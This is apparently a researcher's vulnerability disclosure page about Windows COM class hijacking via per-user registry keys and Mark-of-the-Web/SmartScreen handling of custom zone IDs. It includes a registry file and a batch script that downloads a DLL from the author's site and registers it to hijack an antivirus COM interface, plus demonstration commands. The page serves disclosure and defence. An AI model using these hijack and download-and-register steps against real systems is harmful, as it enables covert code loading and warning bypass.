Windows 2000 introduced the merged view of the HKEY_CLASSES_ROOT virtual Registry tree.

Thanks to this feature, COM classes and interfaces registered by (unprivileged) users below the user’s HKEY_CURRENT_USER\Software\Classes Registry key obscure the corresponding COM classes and interfaces registered (by administrators) below the machine’s HKEY_LOCAL_MACHINE\SOFTWARE\Classes Registry key.

Demonstration

On a 32-bit installation of Windows XP SP2 or any newer version of Windows perform the following 6 simple steps (adaption for 64-bit installations is left as an exercise to the reader).

Log on to an arbitrary (unprivileged) user account.
Download the SENTINEL.DLL of the Vulnerability and Exploit Detector and save it in an arbitrary directory.

Create a text file SENTINEL.REG with the following contents:

REGEDIT4

; Copyright © 2004-2024, Stefan Kanthak <stefan‍.‍kanthak‍@‍nexgo‍.‍de>

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}]
@="Vulnerability and Exploit Detector"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="MSOfficeAntiVirus"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32]
; NOTE: replace ‹path› with the directory used in step 2.
@="‹path›\\SENTINEL.DLL"
"ThreadingModel"="Both"

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\TreatAs]
@="{2781761E-28E0-4109-99FE-B9D127C57AFE}"

; NOTE: the following entries are optional and can be omitted!

[HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="IOfficeAntiVirus"

[HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
@="IOfficeAntiVirus"

[HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\BaseInterface]
@="{00000000-0000-0000-C000-000000000046}" ; IUnknown

[HKEY_CURRENT_USER\Software\Classes\Interface\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\NumMethods]
@="4"

Double-click the file SENTINEL.REG created in the previous step 3. to merge it into the user’s Registry.
Run the following command line to verify the proper registration of the COM class:
```
RUNDLL32.EXE /STA {2781761E-28E0-4109-99FE-B9D127C57AFE}
```
Download an arbitrary (portable executable image) file with your WWW browser, for example SENTINEL.EXE, or save an attachment in your mail client, and notice the message boxes displayed from the SENTINEL.DLL downloaded in step 2.

Batch Script

The following batch script performs all the above steps on 32-bit and 64-bit installations of Windows XP and newer versions of Windows:

Rem Copyright © 2004-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

"%SystemRoot%\System32\BITSAdmin.exe" /TRANSFER IOAV /DOWNLOAD /PRIORITY FOREGROUND http://skanthak.hier-im-netz.de/download/SENTINEL.CAB "%TMP%\SENTINEL.CAB"
If Not Exist "%TMP%\SENTINEL.CAB" Exit /B

"%SystemRoot%\System32\Expand.exe" "%TMP%\SENTINEL.CAB" /F:* "%TMP%"
If Not Exist "%TMP%\AMD64\SENTINEL.DLL" Exit /B
If Not Exist "%TMP%\I386\SENTINEL.DLL" Exit /B

Start https://skanthak.hier-im-netz.de/download/SENTINEL.EXE

If "%PROCESSOR_ARCHITECTURE%" == "AMD64" Goto :AMD64
If "%PROCESSOR_ARCHITEW6432%" == "AMD64" Goto :WOW6432
If "%PROCESSOR_ARCHITECTURE%" == "x86" Goto :I386
Exit /B

:AMD64
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}" /VE /T REG_SZ /D "MSOfficeAntiVirus" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /VE /T REG_SZ /D "%TMP%\AMD64\SENTINEL.DLL" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /V "ThreadingModel" /T REG_SZ /D "Both" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\TreatAs" /VE /T REG_SZ /D "{2781761E-28E0-4109-99FE-B9D127C57AFE}" /F

"%SystemRoot%\SysWoW64\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}" /VE /T REG_SZ /D "MSOfficeAntiVirus" /F
"%SystemRoot%\SysWoW64\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /VE /T REG_SZ /D "%TMP%\I386\SENTINEL.DLL" /F
"%SystemRoot%\SysWoW64\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /V "ThreadingModel" /T REG_SZ /D "Both" /F
"%SystemRoot%\SysWoW64\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\TreatAs" /VE /T REG_SZ /D "{2781761E-28E0-4109-99FE-B9D127C57AFE}" /F

"%ProgramFiles(x86)%\Internet Explorer\IExplore.exe" https://skanthak.hier-im-netz.de/download/SENTINEL.CAB
Goto :COMMON

:WOW6432
"%SystemRoot%\Sysnative\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}" /VE /T REG_SZ /D "MSOfficeAntiVirus" /F
"%SystemRoot%\Sysnative\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /VE /T REG_SZ /D "%TMP%\AMD64\SENTINEL.DLL" /F
"%SystemRoot%\Sysnative\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /V "ThreadingModel" /T REG_SZ /D "Both" /F
"%SystemRoot%\Sysnative\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\TreatAs" /VE /T REG_SZ /D "{2781761E-28E0-4109-99FE-B9D127C57AFE}" /F

"%ProgramW6432%\Internet Explorer\IExplore.exe" https://skanthak.hier-im-netz.de/download/SENTINEL.CAB

:I386
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}" /VE /T REG_SZ /D "MSOfficeAntiVirus" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /VE /T REG_SZ /D "%TMP%\I386\SENTINEL.DLL" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\InProcServer32" /V "ThreadingModel" /T REG_SZ /D "Both" /F
"%SystemRoot%\System32\Reg.exe" ADD "HKEY_CURRENT_USER\Software\Classes\CLSID\{56FFCC31-D398-11D0-B2AE-00A0C908FA49}\TreatAs" /VE /T REG_SZ /D "{2781761E-28E0-4109-99FE-B9D127C57AFE}" /F

:COMMON
"%ProgramFiles%\Internet Explorer\IExplore.exe" https://skanthak.hier-im-netz.de/download/SENTINEL.CAB
Start https://skanthak.hier-im-netz.de/download/SENTINEL.DLL
Start "IOAV" "%USERPROFILE%\Downloads\SENTINEL.EXE"
Exit /B

Vulnerability 4

Windows XP SP2 and Internet Explorer 6 SP2 introduced the Attachment Manager, which is called by WWW browsers, mail and news clients, instant messengers, etc. after they store a downloaded file, a WWW page, an email or an attachment, and by File Explorer when such a file is to be opened or executed.
In the first case the Attachment Manager adds the Mark of the Web, an NTFS Alternate Data Stream named Zone.Identifier containing the text [ZoneTransfer]\r\nZoneId=‹integer›\r\n to the saved file; in the second case it evaluates the Mark of the Web.

REGEDIT4

[HKEY_CLASSES_ROOT\.‹extension›]
"EditFlags"=dword:00020000 ; FTA_AlwaysUnsafe

[HKEY_CLASSES_ROOT\‹ProgId›]
"EditFlags"=dword:00020000 ; FTA_AlwaysUnsafe

[HKEY_CURRENT_USER\Software\Microsoft\Windows\Currentversion\Policies\Associations]
;                    =dword:00001806 ; high risk
"DefaultFileTypeRisk"=dword:00001807 ; moderate risk
;                    =dword:00001808 ; low risk
"HighRiskFileTypes"="{.‹extension›|‹ProgId›};…"
"LowRiskFileTypes"="{.‹extension›|‹ProgId›};…"
"ModRiskFileTypes"="{.‹extension›|‹ProgId›};…"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments]
"HideZoneInfoOnProperties"=dword:00000000
"SaveZoneInformation"=dword:00000002
"ScanWithAntiVirus"=dword:00000003
"UseTrustedHandlers"=dword:00000003

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Currentversion\Policies\Associations]
;                    =dword:00001806 ; high risk
"DefaultFileTypeRisk"=dword:00001807 ; moderate risk
;                    =dword:00001808 ; low risk
"HighRiskFileTypes"="{.‹extension›|‹ProgId›};…"
"LowRiskFileTypes"="{.‹extension›|‹ProgId›};…"
"ModRiskFileTypes"="{.‹extension›|‹ProgId›};…"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments]
"HideZoneInfoOnProperties"=dword:00000000
"SaveZoneInformation"=dword:00000002
"ScanWithAntiVirus"=dword:00000003
"UseTrustedHandlers"=dword:00000003

Windows 8 introduced Windows Defender SmartScreen ...

REGEDIT4

[HKEY_CLASSES_ROOT\‹ProgId›\Shell\‹Verb›]
"NoSmartScreen"=dword:00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
"SmartScreenEnabled"="Warn"
;                   ="Off"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System]
"EnableSmartScreen"=dword:00000001
"ShellSmartScreenLevel"="Warn"
;                      ="None"
;                      ="Block"

Demonstration

Perform the following 15 simple steps to demonstrate the wicked behaviour, the weakness and the vulnerability:

Log on to an arbitrary (unprivileged) user account and start the Command Processor %SystemRoot%\System32\Cmd.exe alias %ComSpec% in an arbitrary, preferable empty directory.
Note: if you don’t want to switch between the Command Processor and File Explorer windows, choose the desktop and skip step 3.
Execute the following (block of) command lines to create 8 text files Offender.cmd, Offender.com, Offender.exe, Offender.reg, Offender.rtf, Offender.txt, Offender.url and Offender.vbs, plus a cabinet archive Offender.cab in the directory chosen in step 1.:
```
COPY NUL: Offender.exe
1>Offender.cmd ECHO PAUSE
1>Offender.com ECHO X5O!P%@AP[4\PZX54(P^^^^)7CC)7}$Write_any_string_on_standard_output$H+H*
1>Offender.reg ECHO REGEDIT4
1>Offender.rtf ECHO {\rtf1\ansi}
1>Offender.txt ECHO
1>Offender.url ECHO [InternetShortcut]
1>>Offender.url ECHO URL=about:blank
1>Offender.vbs ECHO WScript.Echo WScript.ScriptFullName
MAKECAB.EXE Offender.txt Offender.cab
```
```
        1 file(s) copied.
Cabinet Maker - Lossless Data Compression Tool

100.00% [flushing current folder]
```
Note: the file extensions .cmd, .com, .exe, .reg, .rtf, .url and .vbs are all classified dangerous; see the documentation for the Win32 functions AssocIsDangerous() and SaferiIsExecutableFileType() for details. FILETYPEATTRIBUTEFLAGS enumeration
Note: Offender.com is a modified EICAR standard anti-virus test file; its file size is 70 bytes.
Start the File Explorer to open the directory chosen in step 1.:
```
START .
```
Double-click the 8 text files created in step 2. to open or execute them (in alphabetical order) and notice the default behaviour:
- Execution of Offender.cmd opens another window of the Command Processor, writes the text Press any key to continue . . . and waits for any key to be pressed.
- On 64-bit systems, due to the missing NT Virtual DOS Machine, execution of Offender.com fails with error code 216 alias ERROR_EXE_MACHINE_TYPE_MISMATCH, derived from NTSTATUS 0x40000023 alias STATUS_IMAGE_MACHINE_TYPE_MISMATCH_EXE; Windows’ module loader displays a message box to report the error.
- On 32-bit systems, execution of Offender.com writes the text Write_any_string_on_standard_output and closes the window of the NT Virtual DOS Machine immediately.
- Execution of Offender.exe fails (expected and intended) with error code 193 alias ERROR_BAD_EXE_FORMAT, derived from NTSTATUS 0xC000011E alias STATUS_MAPPED_FILE_SIZE_ZERO or 0xC000012F alias STATUS_INVALID_IMAGE_NOT_MZ respectively; Windows’ module loader displays a message box to report the error.
- Execution of Offender.reg starts the Registry Editor which asks for confirmation (twice if started in the ~~user~~ protected administrator account created during Windows Setup).
- Execution of Offender.rtf starts WordPad which shows a blank page.
- Execution of Offender.txt starts Editor which shows the text ECHO is on.
- Execution of Offender.url starts the default WWW browser which shows a blank page.
- Execution of Offender.vbs starts the Windows Script Host which displays a message box titled Windows Script Host with the fully qualified pathname of Offender.vbs and waits for the OK button to be clicked.
Close WordPad, Editor and all message boxes.
Double-click the cabinet archive Offender.cab created in step 1. to open it, then select its contents and click Extract…: the archive file opens in File Explorer and extraction succeeds.
Right click the file Offender.txt to display its context menu, then open the Send to drop-down menu and click Compressed (zipped) folder to create a ZIP archive Offender.zip.
Right click the ZIP archive created in step 5. to display its context menu, then click Extract all… and follow the wizard: extraction succeeds too.

Activate the Command Processor window and execute the following (block of) command lines to add a Mark of the Web specifying the Internet zone to the 10 files Offender.* created before:

FOR %? IN (Offender.*) DO @(
ECHO [ZoneTransfer]
ECHO ZoneId=3
) 1>%?:Zone.Identifier

(
ECHO [ZoneTransfer]
 ECHO ZoneId=3
) 1>Offender.cab:Zone.Identifier

(
ECHO [ZoneTransfer]
 ECHO ZoneId=3
) 1>Offender.cmd:Zone.Identifier

(
ECHO [ZoneTransfer]
 ECHO ZoneId=3
) 1>Offender.com:Zone.Identifier

(
ECHO [ZoneTransfer]
 ECHO ZoneId=3
) 1>Offender.exe:Zone.Identifier

(
ECHO [ZoneTransfer]
 ECHO ZoneId=3
) 1>Offender.reg:Zone.Identifier

(
ECHO [ZoneTransfer]
 ECHO ZoneId=3
) 1>Offender.rtf:Zone.Identifier

(
ECHO [ZoneTransfer]
 ECHO ZoneId=3
) 1>Offender.txt:Zone.Identifier

(
ECHO [ZoneTransfer]
 ECHO ZoneId=3
) 1>Offender.url:Zone.Identifier

(
ECHO [ZoneTransfer]
 ECHO ZoneId=3
) 1>Offender.vbs:Zone.Identifier

(
ECHO [ZoneTransfer]
 ECHO ZoneId=3
) 1>Offender.zip:Zone.Identifier

Activate the File Explorer window, right click on one of the 10 files Offender.* to display its context menu, then click Properties: the security notice This file came from another computer and might be blocked to help protect this computer. is shown at the bottom of the Properties dialog box.
Close the Properties dialog box, then double-click the application Offender.exe to execute it: a dialog box titled Windows protected your PC with the message text Windows Defender SmartScreen prevented an unrecognized app from starting, Running this app might put your PC at risk. […] is displayed.
After clicking the button Run anyway the module loader displays the same error message box as in step 4.
Double-click the other 9 files Offender.* too: except for Offender.cab, Offender.rtf, Offender.txt and Offender.zip the same dialog box titled Windows protected your PC is displayed; clicking the button Run anyway yields the same result as in step 4.
Repeat steps 6. and 7., then right click the extracted files to display their context menu and click Properties: the security notice This file came from another computer and might be blocked to help protect this computer. is shown at the bottom of the Properties dialog box, demonstrating that file extraction propagates the Mark of the Web for the Internet zone.

Activate the Command Processor window again and execute the following (block of) command lines to write a Mark of the Web specifying a custom zone to the 10 files Offender.* created before:

FOR %? IN (Offender.*) DO @(
ECHO [ZoneTransfer]
ECHO ZoneId=1000
) 1>%?:Zone.Identifier

(
ECHO [ZoneTransfer]
 ECHO ZoneId=1000
) 1>Offender.cab:Zone.Identifier

(
ECHO [ZoneTransfer]
 ECHO ZoneId=1000
) 1>Offender.cmd:Zone.Identifier

(
ECHO [ZoneTransfer]
 ECHO ZoneId=1000
) 1>Offender.com:Zone.Identifier

(
ECHO [ZoneTransfer]
 ECHO ZoneId=1000
) 1>Offender.exe:Zone.Identifier

(
ECHO [ZoneTransfer]
 ECHO ZoneId=1000
) 1>Offender.reg:Zone.Identifier

(
ECHO [ZoneTransfer]
 ECHO ZoneId=1000
) 1>Offender.rtf:Zone.Identifier

(
ECHO [ZoneTransfer]
 ECHO ZoneId=1000
) 1>Offender.url:Zone.Identifier

(
ECHO [ZoneTransfer]
 ECHO ZoneId=1000
) 1>Offender.vbs:Zone.Identifier

(
ECHO [ZoneTransfer]
 ECHO ZoneId=1000
) 1>Offender.zip:Zone.Identifier

Activate the File Explorer window, right click on one of the 10 files Offender.* to display its context menu, then click Properties: the security notice This file came from another computer and might be blocked to help protect this computer. is shown at the bottom of the Properties dialog box.
Close the Properties dialog box, then double-click the application Offender.exe to execute it again: no reaction, no warning, no error message box!
Double-click the other 9 files Offender.* again: Offender.cmd, Offender.com and Offender.reg exhibit no reaction too, while Offender.cab, Offender.rtf, Offender.txt, Offender.url, Offender.vbs and Offender.zip are opened as before.
Repeat step 6., then right click the extracted file to display its context menu and click Properties: the security notice This file came from another computer and might be blocked to help protect this computer. is not shown at the bottom of the Properties dialog box, i.e. the Mark of the Web for the custom zone was not propagated from the cabinet archive Offender.cab!
Repeat step 7.: an error message box Access is denied. is displayed.

Activate the Command Processor window and execute the following command line to open or execute all 10 files for the last time:

FOR %? IN (Offender.*) DO START /WAIT %?

START /WAIT Offender.cab

START /WAIT Offender.cmd
Access denied

START /WAIT Offender.com
Access denied

START /WAIT Offender.exe
Access denied

START /WAIT Offender.reg
Access denied

START /WAIT Offender.rtf

START /WAIT Offender.txt

START /WAIT Offender.url

START /WAIT Offender.vbs

START /WAIT Offender.zip

Note: a repetition of this demonstration after replacing the number 1000 with another value, for example an asterisk, is left as an exercise to the reader!

Vendor Statement

The MSRC assigned case number 64021 to the above vulnerability report and replied with the following statements:

We have investigated this issue and determined that it is more of a functionality bug that there is no GUI message displayed, rather than a security vulnerability.
Unfortunately, as this does not meet our bar for servicing in an immediate security update, I have closed this case.

OUCH: denial of service due to CWE-20: Improper Input Validation, CWE-1284: Improper Validation of Specified Quantity in Input, CWE-1286: Improper Validation of Syntactic Correctness of Input and CWE-1287: Improper Validation of Specified Type of Input as well as CAPEC-210: Abuse Existing Functionality is commonly handled as vulnerability!

Mitigation

use SAFER alias Software Restrictions Policies, AppLocker or Windows Defender Application Control to prevent execution in all user-writable directories.

Contact and Feedback

If you miss anything here, have additions, comments, corrections, criticism or questions, want to give feedback, hints or tipps, report broken links, bugs, deficiencies, errors, inaccuracies, misrepresentations, omissions, shortcomings, vulnerabilities or weaknesses, …: don’t hesitate to contact me and feel free to ask, comment, criticise, flame, notify or report!

Use the X.509 certificate to send S/MIME encrypted mail.

Note: email in weird format and without a proper sender name is likely to be discarded!

I dislike HTML (and even weirder formats too) in email, I prefer to receive plain text.
I also expect to see your full (real) name as sender, not your nickname.
I abhor top posts and expect inline quotes in replies.

Terms and Conditions

By using this site, you signify your agreement to these terms and conditions. If you do not agree to these terms and conditions, do not use this site!

The software and the documentation on this site are provided as is without any warranty, neither express nor implied.
In no event will the author be held liable for any damage(s) arising from the use of the software or the documentation.
Permission is granted to use the current version of the software and the current version of the documentation solely for personal private and non-commercial purposes.
An individuals use of the software or the documentation in his or her capacity or function as an agent, (independent) contractor, employee, member or officer of a business, corporation or organisation (commercial or non-commercial) does not qualify as personal private and non-commercial purpose.
Without written approval from the author the software or the documentation must not be used for a business, for commercial, corporate, governmental, military or organisational purposes of any kind, or in a commercial, corporate, governmental, military or organisational environment of any kind.
Redistribution of the software and the documentation is allowed only in unmodified form of its current version and free of charge.

Data Protection Declaration

This web page records no (personal) data and stores no cookies in the web browser.

The web service is operated and provided by

Telekom Deutschland GmbH
Business Center
D-64306 Darmstadt
Germany
<‍hosting‍@‍telekom‍.‍de‍>
+49 800 5252033

The web service provider stores a session cookie in the web browser and records every visit of this web site with the following data in an access log on their server(s):

the (pseudonymised) IP address;
the date and time of the request;
the URL of the requested web page or file;
the Referer and User-Agent HTTP headers sent by the web browser;
the result (success or failure) of the request;
the amount of data received and sent.

Me, myself & IT

Vulnerabilities Introduced by Windows™ Defender

Purpose

Reason

Vulnerability 1

Demonstration

Batch Script

Vendor Statement

Vulnerability 2

Demonstration

Batch Script

Vendor Statement

Background Information

Vulnerability 3

Demonstration

Batch Script

Vulnerability 4

Demonstration

Vendor Statement

Mitigation

Contact and Feedback

Terms and Conditions

Data Protection Declaration

Vulnerabilities Introduced by Windows^™ Defender